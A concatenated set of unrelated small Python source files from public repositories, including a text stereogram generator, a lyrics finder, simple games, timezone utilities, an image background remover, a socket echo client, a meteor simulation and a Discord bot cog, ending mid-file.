forward slashes and\n backslashes offset appropriately\"\"\"\n stereo_lines = []\n regex_fg = re.compile(r' ?\\/(.*)\\/ ?')\n regex_bg = re.compile(r' ?\\\\(.*)\\\\ ?')\n for line in self.get_lines():\n if self.get_double_space():\n line = line.replace(' ', ' ')\n while re.search(regex_fg, line) is not None:\n line = re.sub(regex_fg, r'\\1 ', line)\n while re.search(regex_bg, line) is not None:\n line = re.sub(regex_bg, r' \\1', line)\n stereo_lines.append(line)\n return stereo_lines.copy()\n\n def get_padded_str(self, line_text, pad_len, longest_line):\n \"\"\"returns line with padding before and after string.\n line_text: (string) line of text to add padding to\n pad_length: (int) length of padding to be added to longest\n line\n longest_line: (int) length of longest line\"\"\"\n line_len = longest_line + (pad_len * 2)\n padding = ' ' * int((line_len - len(line_text)) / 2)\n padded_line = padding + line_text + padding\n if len(padded_line) == line_len:\n return padded_line\n else:\n return padded_line + ' '\n\n def __str__(self):\n lines = self.get_stripped_lines()\n stereos = self.get_stereo_lines()\n\n # set beginning of text block\n start_end = '*' * (self.get_longest_line() + 2 +\n 
(self.get_padding_len() * 2))\n ret = (start_end * 2)[:-1] + '\\n'\n\n # add vertical padding to top of text block\n for i in range(self.get_vpadding_len()):\n ret += '*' + (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*'\n ret += (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*\\n'\n\n # add text block panels\n for line, stereo in zip(lines, stereos):\n ret += '*' + self.get_padded_str(line,\n self.get_padding_len(),\n self.get_longest_line()) + '*'\n ret += self.get_padded_str(stereo,\n self.get_padding_len(),\n self.get_longest_line()) + '*\\n'\n\n # add vertical padding to bottom of text block\n for i in range(self.get_vpadding_len()-1):\n ret += '*' + (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*'\n ret += (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*\\n'\n ret += (start_end * 2)[:-1]\n return ret\n\n\nclass stereo_sirt(object):\n \"\"\"This is a class for building 'single image random text'\n autostereograms. A depth map should be passed consisting of\n equal-length lines of text made up of numbers 0 through 9. The\n output will be an autostereogram with the depth of the 3d effect\n following the depth map, with 0 being the farthest away from the\n view, and 9 being closest.\"\"\"\n\n def __init__(self, depth_map, pattern_len=PATTERN_LEN):\n \"\"\"depth_map: (multiline string of numbers 0 through 9) Depth\n map for 3d effect. All lines should be of equal length, all\n characters should be numbers, and no number should be more or\n less than 1 higher/lower than the number before it.\n pattern_len: (integer) The length of the repeating pattern\n for each line.\"\"\"\n self.depth_map = []\n lineLen = 0\n for line in depth_map.split('\\n'):\n if len(line.strip()) > 0:\n if lineLen == 0:\n lineLen = len(line.strip())\n elif len(line.strip()) is not lineLen:\n raise AssertionError('All lines in depth map must be the '\n 'same length')\n c = 0\n for i in line:\n if re.search(r'[^0-9]', line[c]) is not None:\n raise AssertionError('Depth map can only contain '\n 'numbers')\n if abs(int(line[c]) - int(line[c-1])) > 1:\n raise AssertionError('All numbers in depth map must '\n 'be no more than 1 more or less '\n 'than the numbers before and '\n 'after it')\n c += 1\n self.depth_map.append(line.strip())\n self.pattern_chars = PATTERN_CHARS\n if pattern_len <= len(self.pattern_chars) and pattern_len > 5:\n self.pattern_len = pattern_len\n else:\n raise AssertionError('Pattern length cannot be less than 5, or '\n 'greater than the number of pattern '\n 'characters')\n\n def get_pattern_len(self):\n \"\"\"Returns integer for length of pattern to generate.\"\"\"\n return self.pattern_len\n\n def set_pattern_len(self, pattern_len):\n \"\"\"Changing the pattern length may make it easier to focus on\n the final image that's generated.\n pattern_len: (integer) Length of pattern to generate\"\"\"\n if pattern_len <= len(self.pattern_chars) and pattern_len > 5:\n self.pattern_len = pattern_len\n else:\n raise AssertionError('Pattern length cannot be less than 5, or '\n 'greater than the number of pattern '\n 'characters')\n\n def set_pattern_chars(self, pattern_chars):\n \"\"\"pattern_chars: (string) characters to choose from when\n generating random pattern.\"\"\"\n if self.pattern_len <= len(pattern_chars):\n self.pattern_chars = pattern_chars\n else:\n raise AssertionError('The number of pattern characters cannot be '\n 'less than the pattern length')\n\n def get_pattern_chars(self):\n \"\"\"Returns 
characters to choose from when generating random\n pattern.\"\"\"\n return self.pattern_chars\n\n def get_pattern(self):\n \"\"\"Returns random pattern.\"\"\"\n pattern_len = self.get_pattern_len()\n chars = self.get_pattern_chars()\n pattern = ''\n for _ in range(pattern_len):\n random_char = random.choice(chars)\n while random_char in pattern:\n random_char = random.choice(chars)\n pattern += random_char\n return pattern\n\n def get_pattern_char(self, current_pattern):\n \"\"\"Returns random character that does not exist in the current\n pattern.\n current_pattern: (string) String containing characters that\n should not be returned by this method.\"\"\"\n chars = self.get_pattern_chars()\n random_char = random.choice(chars)\n while random_char in current_pattern:\n random_char = random.choice(chars)\n return random_char\n\n def get_depth_map(self):\n \"\"\"Returns list object with each element being a line of the\n depth map.\"\"\"\n return self.depth_map.copy()\n\n def get_depth_map_str(self):\n \"\"\"Returns multiline string containing the entire depth map.\"\"\"\n depth_map = self.get_depth_map()\n result = ''\n for line in depth_map:\n result += line + '\\n'\n return result\n\n def __str__(self):\n ret = ''\n depth_map = self.get_depth_map()\n for line in depth_map:\n pattern = self.get_pattern()\n # 'p' tracks where we are in the pattern\n # 'c' tracks where we are in the line\n # 'new_pattern' will hold changes to the pattern\n # 'new_line' will hold the current line that we're building\n p = 0\n c = 0\n new_pattern = ''\n new_line = pattern\n for _ in line[:-1]:\n if p == len(pattern):\n p = 0\n pattern = new_pattern\n new_pattern = ''\n if line[c] < line[c+1]:\n new_char = ''\n elif line[c] < line[c-1]:\n new_char = (self.get_pattern_char(pattern + new_pattern) +\n pattern[p])\n else:\n new_char = pattern[p]\n new_pattern += new_char\n new_line += new_char\n c += 1\n p += 1\n ret += new_line + '\\n'\n return ret\n","repo_name":"kf5grd/stereo_text","sub_path":"stereo_text.py","file_name":"stereo_text.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33573256363","text":"'''\r\nTopic: Finding songs lyrics using tkinter for user interface and\r\nlyricsgenius for searching songs lyrics\r\n'''\r\n\r\nfrom tkinter import * # Importing tkinter module\r\nfrom PIL import ImageTk, Image # Import PIL for using jpeg image in background\r\nimport lyricsgenius as lg # Import lyricsgenius\r\n\r\n# Creating Tk object\r\nroot = Tk()\r\n\r\n# Setting up root width and height\r\nroot.geometry(\"600x800\")\r\n\r\n# root title\r\nroot.title(\"Lyrics Finder\")\r\n\r\n# Disenabling root resize property\r\nroot.resizable(0, 0)\r\n\r\n# Setting up background image and placing it\r\nbgImg = Image.open(\"musicbg.jpg\")\r\nbgPhoto = ImageTk.PhotoImage(bgImg)\r\nbgLbl = Label(root, image=bgPhoto)\r\nbgLbl.place(x=0, y=0, relwidth=1, relheight=1)\r\n\r\n\r\ndef back_to_main():\r\n '''\r\n This function will take user back to main_func\r\n '''\r\n\r\n # Deleting widgets of show_lyrics function\r\n del2_list = [scroll_x, scroll_y, song_textbox, back_btn]\r\n for i in del2_list:\r\n i.destroy()\r\n\r\n main_func()\r\n\r\n# Function to show lyrics\r\ndef show_lyrics():\r\n '''\r\n This function will show lyrics of the song\r\n '''\r\n\r\n global scroll_x, scroll_y, song_textbox, back_btn\r\n\r\n # Deleting widgets of main_func\r\n del_list = [main_lbl, entry_box, sub_lbl, go_btn]\r\n for i in del_list:\r\n 
i.destroy()\r\n\r\n # Getting song name from song_var and setting it to root title\r\n song_name = song_var.get().title()\r\n root.title(song_name)\r\n\r\n # Scroll bar for horizontal and vertical axis\r\n scroll_x = Scrollbar(root, orient=\"horizontal\")\r\n scroll_y = Scrollbar(root, orient=\"vertical\")\r\n\r\n # Packing scrollbar at required position\r\n scroll_x.pack(side=BOTTOM, fill=X)\r\n scroll_y.pack(side=RIGHT, fill=Y)\r\n\r\n # Textbox where lyrics will be showe up\r\n song_textbox = Text(root, width=69, height=40, bg=\"black\", fg=\"purple\", xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set, font=\"time 10 bold\")\r\n song_textbox.place(x=20, y=20)\r\n\r\n # Searching for song lyrics\r\n genius = lg.Genius('',\r\n skip_non_songs=True, excluded_terms=[\"(Remix)\", \"(Live)\"],\r\n remove_section_headers=True)\r\n\r\n\r\n song = genius.search_song(song_name)\r\n\r\n # Inserting lyrics in song_textbox\r\n song_textbox.insert(END, song.artist)\r\n song_textbox.insert(END, \"\\n\\n\")\r\n\r\n for i in song.lyrics:\r\n song_textbox.insert(END, i)\r\n\r\n song_textbox.insert(END, \"\\n\\n\")\r\n\r\n # Connecting scrollbar to song_textbox widget\r\n scroll_x.config(command=song_textbox.xview)\r\n scroll_y.config(command=song_textbox.yview)\r\n\r\n # Buttton to return back to main screen\r\n back_btn = Button(root, text=\"Back\", bg=\"black\", fg=\"purple\", font=\"time 15 bold\", width=10, command=back_to_main)\r\n back_btn.place(x=20, y=680)\r\n\r\n\r\ndef main_func():\r\n '''\r\n This is the main function\r\n '''\r\n\r\n global main_lbl, entry_box, sub_lbl, go_btn, song_var\r\n\r\n # Main heading\r\n main_lbl = Label(root, text=\"Lyrics Finder\", font=\"harrington 40 bold underline\", fg=\"purple\", bg=\"black\")\r\n main_lbl.place(x=150, y=170)\r\n\r\n song_var = StringVar() # Variabel for storing user input\r\n\r\n # Entry box for taking user input\r\n entry_box = Entry(root, textvar=song_var, width=50, bg=\"lightgrey\", fg=\"black\", font=\"time 15 bold\")\r\n entry_box.place(x=25, y=300, height=60)\r\n\r\n sub_lbl = Label(root, text=\"Type the name of the song in the above box...\", font=\"harrington 17 bold italic\", fg=\"purple\", bg=\"black\")\r\n sub_lbl.place(x=25, y=380)\r\n\r\n # Go button will take the user where lyrics are\r\n go_btn = Button(root, text=\"Go-->\", bg=\"black\", fg=\"purple\", font=\"time 15 bold\", width=10, command=show_lyrics)\r\n go_btn.place(x=240, y=500)\r\n\r\n\r\nmain_func() # Calling main function\r\nroot.mainloop() # Calling root.mainloop() to run our program\r\n","repo_name":"amisha128/songlyrics-finder","sub_path":"songLyricsFinder.py","file_name":"songLyricsFinder.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71714916325","text":"import turtle\nimport os\n\nwn = turtle.Screen()\nwn.title(\"Гоненица\")\nwn.bgcolor(\"#DFB9CA\")\nwn.setup(width=1200, height=400)\nwn.tracer(0)\n\n\n\n# pole\nfor kletka in range(1, 38):\n\n # kvadratche\n kvadratche = turtle.Turtle()\n kvadratche.speed(0)\n kvadratche.shape(\"square\")\n kvadratche.color(\"#F34616\")\n kvadratche.penup()\n kvadratche.goto((kletka * (20+10)) - 580, 0)\n# eof kletka\n\n#igrach\nigrach = turtle.Turtle()\nigrach.pozicia_na_igrach = 0\nigrach.speed(0)\nigrach.shape(\"circle\")\nigrach.color(\"#18730B\")\nigrach.penup()\nigrach.goto((igrach.pozicia_na_igrach * (20+10)) - 580, 0)\n\n\ntext = 
turtle.Turtle()\ntext.speed(0)\ntext.color(\"#F34616\")\ntext.penup()\ntext.hideturtle()\ntext.goto(0, 20)\ntext.clear()\ntext.write(\"Roll: 6\", align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n\n# Functions\ndef roll_dice():\n igrach.pozicia_na_igrach += 2\n igrach.setx((igrach.pozicia_na_igrach * (20+10)) - 580)\n\n\n# Keyboard bindings\nwn.listen()\nwn.onkeypress(roll_dice, \"r\")\nwn.onkeypress(roll_dice, \"space\")\nwn.onkeypress(roll_dice, \"Up\")\n\n# Main game loop\nwhile True:\n wn.update()\n","repo_name":"alexscorpion/gonenitsa-silata_e_v_teb","sub_path":"animated complete.py","file_name":"animated complete.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6294859614","text":"\"\"\"Importing the random module and using the randint() function\"\"\"\nimport random\nupper_limit = 10\nanswer = random.randint(1, upper_limit)\n\nprint(\"Please guess a number between 1 and {}: \".format(upper_limit))\nguess = int(input())\n\nif guess < answer:\n print('Too low. Guess again: ')\n guess = int(input())\n if guess == answer:\n print('Well done! You guessed it!')\n else:\n print('Sorry. Wrong again. \\nThe correct answer was {}'.format(answer))\nelif guess > answer:\n print('Too high. Guess again: ')\n guess = int(input())\n if guess == answer:\n print('Well done! You guessed it!')\n else:\n print('Sorry. Wrong again.\\nThe correct answer was {}'.format(answer))\nelse:\n print('You got it correct on your first try! \\nThe number was ' + str(guess) + '!')\n","repo_name":"Fitzpa/learning-python","sub_path":"02_control_flow/guessing_game_02.py","file_name":"guessing_game_02.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6092875591","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rc('animation', html='jshtml')\nimport matplotlib.animation as animation\n\ndef test_policy(policy, env, render = False):\n\n frames = []\n\n obs = env.reset()\n done = False\n\n # number of timesteps so far\n t = 0\n\n # Logging data\n episode_len, episode_return = 0, 0 \n\n while not done:\n t += 1\n if render:\n frames.append(env.render(mode=\"rgb_array\"))\n\n # Query deterministic action from policy and run it\n action = policy(obs).detach().numpy()\n obs, reward, done, _ = env.step(action)\n\n # Sum all episodic rewards as we go along\n episode_return += reward\n \n # Track episodic length\n episode_len = t\n env.close()\n\n return episode_len, episode_return, frames\n\ndef update_scene(num, frames, patch):\n patch.set_data(frames[num])\n return patch,\n\ndef plot_animation(frames, repeat=False, interval=40):\n fig = plt.figure()\n patch = plt.imshow(frames[0])\n plt.axis('off')\n anim = animation.FuncAnimation(\n fig, update_scene, fargs=(frames, patch),\n frames=len(frames), repeat=repeat, interval=interval)\n plt.close()\n return anim","repo_name":"clam004/proximalpolicyoptimization","sub_path":"test_policy.py","file_name":"test_policy.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16495191582","text":"\"\"\":mod:`libearth.tz` --- Basic timezone implementations\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAlmost of this module is from the official documentation of\n:mod:`datetime` module in Python standard library.\n\n.. 
data:: utc\n\n   (:class:`Utc`, :class:`datetime.timezone`) The :class:`~datetime.tzinfo`\n   instance that represents UTC.  It's an instance of :class:`Utc`\n   in Python 2 (which provide no built-in fixed-offset\n   :class:`~datetime.tzinfo` implementation), and an instance of\n   :class:`~datetime.timezone` with zero offset in Python 3.\n\n\"\"\"\nimport datetime\n\nfrom .compat import string_type\n\n__all__ = 'FixedOffset', 'Utc', 'guess_tzinfo_by_locale', 'now', 'utc'\n\n\nclass Utc(datetime.tzinfo):\n    \"\"\"UTC.\n\n    In most cases, it doesn't need to be directly instantiated:\n    there's already the :const:`utc` value.\n\n    \"\"\"\n\n    def __init__(self):\n        self.zero = datetime.timedelta(0)\n\n    def utcoffset(self, dt):\n        return self.zero\n\n    def dst(self, dt):\n        return self.zero\n\n    def tzname(self, dt):\n        return 'UTC'\n\n    def __repr__(self):\n        cls = type(self)\n        return '{0.__module__}.{0.__name__}()'.format(cls)\n\n\nclass FixedOffset(datetime.tzinfo):\n    \"\"\"Fixed offset in minutes east from UTC.\n\n    >>> kst = FixedOffset(9 * 60, name='Asia/Seoul')  # KST +09:00\n    >>> current = now()\n    >>> current\n    datetime.datetime(2013, 8, 15, 3, 18, 37, 404562, tzinfo=libearth.tz.Utc())\n    >>> current.astimezone(kst)\n    datetime.datetime(2013, 8, 15, 12, 18, 37, 404562,\n                      tzinfo=<libearth.tz.FixedOffset Asia/Seoul>)\n\n    \"\"\"\n\n    def __init__(self, offset, name=None):\n        self.offset = datetime.timedelta(minutes=offset)\n        self.dst_ = datetime.timedelta(0)\n        self.name = name or '{h:+03d}:{m:02d}'.format(h=offset // 60,\n                                                      m=offset % 60)\n\n    def utcoffset(self, dt):\n        return self.offset\n\n    def dst(self, dt):\n        return self.dst_\n\n    def tzname(self, dt):\n        return self.name\n\n    def __repr__(self):\n        cls = type(self)\n        return '<{0.__module__}.{0.__name__} {1}>'.format(cls, self.name)\n\n\ntry:\n    utc = datetime.timezone.utc\nexcept AttributeError:\n    utc = Utc()\n\n\ndef now():\n    \"\"\"Return the current :class:`~datetime.datetime` with the proper\n    :class:`~datetime.tzinfo` setting.\n\n    >>> now()\n    datetime.datetime(2013, 8, 15, 3, 17, 11, 892272, tzinfo=libearth.tz.Utc())\n    >>> now()\n    datetime.datetime(2013, 8, 15, 3, 17, 17, 532483, tzinfo=libearth.tz.Utc())\n\n    \"\"\"\n    return datetime.datetime.utcnow().replace(tzinfo=utc)\n\n\nLANGUAGE_COUNTRY_TZINFO_TABLE = {\n    'ko': {'kr': FixedOffset(9 * 60, 'Asia/Seoul')},\n    'ja': {'jp': FixedOffset(9 * 60, 'Asia/Tokyo')}\n}\n\n\ndef guess_tzinfo_by_locale(language, country=None):\n    \"\"\"Guess the most commonly used time zone from the given locale.\n\n    :param language: the language code e.g. ``ko``, ``JA``\n    :type language: :class:`str`\n    :param country: optional country code e.g. ``kr``, ``JP``\n    :type country: :class:`str`\n    :return: the most commonly used time zone, or :const:`None` if can't\n             guess\n    :rtype: :class:`datetime.tzinfo`\n
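\n    .. versionadded:: 0.3.0\n\n    A quick example (offsets taken from the locale table above):\n\n    >>> guess_tzinfo_by_locale('ko', 'kr')\n    <libearth.tz.FixedOffset Asia/Seoul>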
\n\n    \"\"\"\n    if not isinstance(language, string_type):\n        raise TypeError('language must be a string, not ' + repr(language))\n    elif not (country is None or isinstance(country, string_type)):\n        raise TypeError('country must be a string, not ' + repr(country))\n    language = language.strip().lower()\n    if len(language) != 2:\n        raise ValueError(repr(language) + ' is not a valid language code')\n    if country:\n        country = country.strip().lower()\n        if len(country) != 2:\n            raise ValueError(repr(country) + ' is not a valid country code')\n    try:\n        countries = LANGUAGE_COUNTRY_TZINFO_TABLE[language]\n    except KeyError:\n        return\n    if country:\n        return countries.get(country)\n    elif len(countries) == 1:\n        for tz in countries.values():\n            return tz\n","repo_name":"earthreader/libearth","sub_path":"libearth/tz.py","file_name":"tz.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"42863545447","text":"#by cuining\n#2019.10.5\nfrom removebg import RemoveBg\nfrom PIL import Image\n\nwhile True:\n    chose = input(\n        \"\"\"\n        ***************************************\n        *           欢迎使用本工具             *\n        * 工具是调用www.remove.bg的API实现抠图  *\n        * 因此自行前往网站注册申请API密钥       *\n        * 个人账户每月免费50张                 *\n        *=====================================*\n        * 去除背景\t\t请按 1               *\n        * 退出工具\t\t请按 0               *\n        *************************************** \n        \"\"\"\n    )\n    if chose == '1':\n    \tapi_key = input(\"请填入你的API密钥:\\n\")\n    \trmbg = RemoveBg(api_key, \"./error.log\") # args: the API key and the error-log path\n    \timage_path0 = input(\"请输入图片地址(例如:G:/photo):\\n\")\n    \timage_path1 = input(\"请输入图片名称(例如:img.png):\\n\")\n    \timage_path = image_path0+'/'+image_path1\n    \trmbg.remove_background_from_img_file(image_path)\n    \tprint(\"抠图已完成!\")\n    \tchose = input(\"\"\"\n    **********************************\n    *    是否需要更换常用背景颜色?  *
\n    *    红底      请按 1          *\n    *    蓝底      请按 2          *\n    *    白底      请按 3          *\n    *    不需要    请按 0          *\n    **********************************\n    \"\"\")\n    \tim = Image.open(image_path0+'/'+image_path1+'_no_bg.png')\n    \tx, y = im.size\n    \tprint(x, y)\n    \tif chose == '1':\n    \t\ttry:\n    \t\t\tp = Image.new('RGBA', im.size, (255, 0, 0))\n    \t\t\tp.paste(im, (0, 0, x, y), im)\n    \t\t\tp.save(image_path0+'/'+image_path1+'_red_bg.png')\n    \t\texcept Exception:\n    \t\t\tprint('error!')\n    \t\texit()\n    \telif chose == '2':\n    \t\ttry:\n    \t\t\tp = Image.new('RGBA', im.size, (0, 0, 255))\n    \t\t\tp.paste(im, (0, 0, x, y), im)\n    \t\t\tp.save(image_path0+'/'+image_path1+'_blue_bg.png')\n    \t\texcept Exception:\n    \t\t\tprint('error!')\n    \t\texit()\n    \telif chose == '3':\n    \t\ttry:\n    \t\t\tp = Image.new('RGBA', im.size, (255, 255, 255))\n    \t\t\tp.paste(im, (0, 0, x, y), im)\n    \t\t\tp.save(image_path0+'/'+image_path1+'_white_bg.png', dpi=(300.0, 300.0))\n    \t\texcept Exception:\n    \t\t\tprint('error!')\n    \t\texit()\n    \telif chose == '0':\n    \t\tprint('欢迎下次使用~~~')\n    \t\texit()\n\n    elif chose == '0':\n        print(\"欢迎下次使用~~~\")\n        break\n    else:\n        print(\"输入有误请重新输入~~~\")","repo_name":"CuiNing6/RemoveBg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1907940365","text":"import os\r\n\r\nuser_menu = None\r\nlist_number = []\r\n\r\nwhile user_menu != \"Q\":\r\n\r\n    os.system(\"cls\")\r\n    input(\"Enter para continuar...\\n\")\r\n    os.system(\"cls\")\r\n\r\n    user_menu = input(\"¿Cual opcion quieres?\\n\"\r\n                      \"A - Añadir un numero\\n\"\r\n                      \"V - Ver la lista de numeros\\n\"\r\n                      \"Q - Ver el menor y el mayor numero de la lista\\n\")\r\n    \r\n    os.system(\"cls\")\r\n    input(\"Enter para continuar...\\n\")\r\n    os.system(\"cls\")\r\n\r\n    if \"A\" == user_menu:\r\n        added_product = int(input(\"¿Que numero deseas añadir a la lista?\\n\"))\r\n        list_number.append(added_product)\r\n        os.system(\"cls\")\r\n\r\n    elif user_menu == \"V\":\r\n\r\n        os.system(\"cls\")\r\n        print(list_number)\r\n        input(\"Enter para Volver al menu...\\n\")\r\n        os.system(\"cls\")\r\n\r\nsmall_number = min(list_number)\r\nbig_number = max(list_number)\r\n\r\nprint(\"El numero mas grande es {} y el mas pequeño es {}\".format(small_number, big_number))","repo_name":"Fakavicen/Primeros_pasos_python_Faka","sub_path":"2clasepythonmastermind/for_ej4.py","file_name":"for_ej4.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23509385412","text":"import math as math\r\nimport pylab as pl\r\nimport numpy as np\r\n\r\nG = 1\r\nA = 1.21\r\nL = 1\r\nZ = 6e+6\r\nRo = 0.122\r\nM = 0.029\r\ng = 9.81\r\nR = 8.314\r\nT = 200\r\n\r\nzr = np.pi/4 # 45 degrees, i.e. pi/4 radians\r\nho = 2e+5 # m (i.e. 200 km)\r\nvo = 4e+4 # m/s\r\nmo = 1e-5 # kg\r\nRm = 3000 # kg/m3\r\n\r\nintezitet = [0]\r\nvreme = [0]\r\n\r\n# print(round(math.sin(math.radians(30)), 2))  # for checking angles\r\n\r\ndef brzinabi(v1, t):\r\n    brzina = -(G*A*m1**(-1/3)*(Rm**(-2/3))*Ra*(v1**2))\r\n    return brzina\r\n\r\ndef brzinaRunge(v0, t0, dt):\r\n    k1 = brzinabi(v0, t0)\r\n    k2 = brzinabi(v0+k1/2, t0+dt/2)\r\n    k3 = brzinabi(v0+k2/2, t0+dt/2)\r\n    k4 = brzinabi(v0+k3, t0+dt)\r\n    v1 = v0+(k1+2*k2+2*k3+k4)/6\r\n    return v1\r\n\r\ndef masabi(m1, t):\r\n    masa = -(L*A*math.pow(m1, 2/3)*math.pow(Rm, -2/3)*v1*v1*v1*Ra)/(2*Z)\r\n    return masa\r\n\r\ndef masaRunge(m0, t0, dt):\r\n    k1 = masabi(m0, t0)\r\n    k2 = masabi(m0+k1/2, t0+dt/2)\r\n    k3 = masabi(m0+k2/2, t0+dt/2)\r\n    k4 = masabi(m0+k3, t0+dt)\r\n    m1 = m0+(k1+2*k2+2*k3+k4)/6\r\n    return m1\r\n\r\n
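# koef_sjaja would give the luminous-efficiency factor tau as a piecewise\r\n# function of velocity (v in m/s, hence the /1000 below); it is left commented\r\n# out, like the intensity and magnitude code further down that would use it.\r\n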
6.04e-4*((v/1000)-8.8)**(-0.35)\r\n# else: tau = 0.024*((v/1000)+8.8)**(-1)\r\n# return tau\r\n\r\ndef visinabi(v1):\r\n visina = ho - v1*zr*dt\r\n return visina\r\n\r\ndef ro_atmo(h1):\r\n Ra=Ro*math.exp(-(M*g*h1)/(R*T))\r\n return Ra\r\n\r\n#def magn_app(I, d):\r\n# Mapp =-14.8-2.5*math.log((683*I)/(4*np.pi*(d**2)),10)\r\n# return Mapp\r\n\r\n#def inte_zra(m, v, h):\r\n# inte = -koef_sjaja(v)*(1/2)*v**2*masabi(m,t)\r\n# return inte\r\n\r\n#def udaljenost_posma(h):\r\n# d = h/round(math.cos(math.radians(zr)),2)\r\n# return d\r\n \r\n\r\nm1 = mo\r\nv1 = vo\r\nh1 = ho\r\nt1 = 0\r\ndt = 0.1\r\nd = 282885.43\r\n#tau = 4.918e-4\r\n\r\nwhile (m1>mo/1000):\r\n print(m1,v1)\r\n #tau = koef_sjaja(v1)\r\n Ra = ro_atmo(h1)\r\n #I = inte_zra(m1, v1, h1)\r\n #intezitet.append(I)\r\n #Mapp = magn_app(I,d)\r\n v2 = brzinaRunge(v1,t1,dt)\r\n m2 = masaRunge(m1,t1,dt)\r\n h2=visinabi(v1)\r\n t1=t1+dt\r\n vreme.append(t1)\r\n #d = udaljenost_posma(h1)\r\n m1=m2\r\n v1=v2\r\n h1=h2 #Udaljenost od posmatraca\r\n\r\n#pl.plot(intezitet, vreme, 'ro')\r\npl.show()\r\n","repo_name":"ispastlibrary/Titan","sub_path":"2016/AST2/Bili/prolecni/Zadatak1.py","file_name":"Zadatak1.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5212212447","text":"# coding=utf8\n\n# std\nimport socket\nimport threading\n\ndef run(iNum = 0):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((\"192.168.0.158\", 10241))\n\tsize = 1024 # 和服务端一致\n\tfm = \"%0\" + str(size) + \"s\"\n\ts.send(fm % iNum)\n\tcount = 0\n\twhile True:\n\t\tdata = s.recv(size)\n\t\ts.send(data)\n\t\tcount += 1\n\t\t# print \"==================>\", count\n\n\namount = 32\nlThread = []\nprint(\"new...\")\nfor i in xrange(amount):\n\tt = threading.Thread(target = run, args = [i])\n\tlThread.append(t)\n\nprint(\"start...\")\nfor t in lThread:\n\tt.start()\n\nprint(\"join...\")\nfor t in lThread:\n\tt.join()\n\nprint(\"All done.\")\n","repo_name":"EdisonChen1024/common_script","sub_path":"python/socket/mysocket_client.py","file_name":"mysocket_client.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21032277386","text":"\"\"\"\nA simple dogfact command.\n\"\"\"\nimport logging\nimport json\nimport requests\nfrom discord.ext import commands\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneralDogFact(commands.Cog):\n \"\"\"\n # Hits the dogfact API and returns the response.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.slash_command()\n async def dogfact(self, ctx):\n \"\"\"\n Sends a dog fact using an API\n \"\"\"\n logger.info(\"%s used the %s command.\"\n , ctx.author.name\n , ctx.command)\n await ctx.respond(\n json.loads(\n requests.get(\n \"https://dog-api.kinduff.com/api/facts\"\n , timeout=5).text)[\"facts\"][0]\n )\n\n\ndef setup(bot):\n \"\"\"\n Required.\n \"\"\"\n bot.add_cog(GeneralDogFact(bot))\n","repo_name":"practical-python-org/ZorakBot","sub_path":"src/zorak/cogs/general/general_dogfact.py","file_name":"general_dogfact.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"41836823465","text":"import logging\nimport aiohttp\nimport asyncio\nimport time\nfrom aiogram import Bot, Dispatcher, types\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, MetaData\nfrom sqlalchemy.orm import 
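# The Runge helpers in Zadatak1.py above follow the fourth-order Runge-Kutta
# shape; this standalone sketch shows the textbook step for dy/dt = f(y, t),
# in which each slope k is scaled by the step size dt (the meteor script
# folds dt into its rate functions differently, so this is a comparison
# sketch rather than a drop-in replacement).
def rk4_step(f, y, t, dt):
    k1 = f(y, t)
    k2 = f(y + dt * k1 / 2, t + dt / 2)
    k3 = f(y + dt * k2 / 2, t + dt / 2)
    k4 = f(y + dt * k3, t + dt)
    return y + dt * (k1 + 2 * k2 + 2 * k3 + k4) / 6

# Sanity check on dy/dt = -y, y(0) = 1: one 0.1 step should be ~exp(-0.1).
print(rk4_step(lambda y, t: -y, 1.0, 0.0, 0.1))  # 0.9048375 vs 0.9048374...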
